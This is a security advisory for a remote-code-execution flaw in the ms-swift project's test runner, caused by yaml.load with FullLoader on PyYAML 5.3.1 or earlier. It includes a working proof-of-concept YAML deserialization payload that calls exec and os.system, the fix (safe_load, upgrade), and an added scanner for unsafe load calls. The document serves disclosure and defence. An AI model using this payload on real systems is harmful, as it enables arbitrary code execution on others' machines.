GHSA-fm6c-f59h-7mmg: MS SWIFT Remote Code Execution via unsafe PyYAML deserialization

Description

A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.

If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.

Affected Repository

  • Project: modelscope/ms-swift
  • Affected versions: latest
  • File: tests/run.py
  • GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Dependency: PyYAML <= 5.3.1

Vulnerable Code

if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Proof of Concept (PoC)

Step 1: Create malicious YAML file (exploit.yaml)

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

This results in execution of os.system, proving code execution.

Mitigation

  • Replace yaml.load() with yaml.safe_load()
  • Upgrade PyYAML to version 5.4 or later

Example Fix:

# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)
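
To find other call sites that need the same fix, the check below walks a Python file's syntax tree and reports every yaml.load() / yaml.load_all() call that does not pass a safe loader. It is an added example, not code from the advisory or from ms-swift; it assumes PyYAML is imported as `yaml`, and the SAMPLE source is constructed for illustration.

```python
import ast

# Loaders that build only plain YAML types (no arbitrary Python objects).
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}

def _loader_name(call):
    """Name of the Loader passed to the call, or None when none is given."""
    node = next((kw.value for kw in call.keywords if kw.arg == "Loader"), None)
    if node is None and len(call.args) >= 2:  # positional: yaml.load(stream, Loader)
        node = call.args[1]
    if node is None:
        return None
    if isinstance(node, ast.Attribute):       # yaml.FullLoader
        return node.attr
    if isinstance(node, ast.Name):            # from yaml import FullLoader
        return node.id
    return "<dynamic>"                        # computed at runtime: review by hand

def find_unsafe_yaml_loads(source, filename="<source>"):
    """Sorted (line, loader) pairs for yaml.load/load_all calls lacking a safe loader."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Assumption: the module is referenced as `yaml` (plain `import yaml`).
        if not (isinstance(func, ast.Attribute) and func.attr in ("load", "load_all")
                and isinstance(func.value, ast.Name) and func.value.id == "yaml"):
            continue
        loader = _loader_name(node)
        if loader not in SAFE_LOADERS:
            findings.append((node.lineno, loader or "<none>"))
    return sorted(findings)

# Constructed sample: the advisory's call pattern beside a safe call site.
SAMPLE = '''\
import yaml
from pathlib import Path

def read_config(args):
    if args.run_config is not None and Path(args.run_config).exists():
        with open(args.run_config, encoding='utf-8') as f:
            return yaml.load(f, Loader=yaml.FullLoader)
    with open("defaults.yaml", encoding="utf-8") as f:
        return yaml.safe_load(f)
'''

if __name__ == "__main__":
    print(find_unsafe_yaml_loads(SAMPLE))
```

Calls made through an alias (for example `import yaml as y`) are not matched by this check and need a separate search.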

Author

ghsa
Author

  • Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
  • Contact: [anchor.rongyu020221@gmail.com]

References

  • GHSA-fm6c-f59h-7mmg
  • modelscope/ms-swift#5174
  • modelscope/ms-swift@b3418ed
  • https://github.com/Anchor0221/CVE-2025-50460
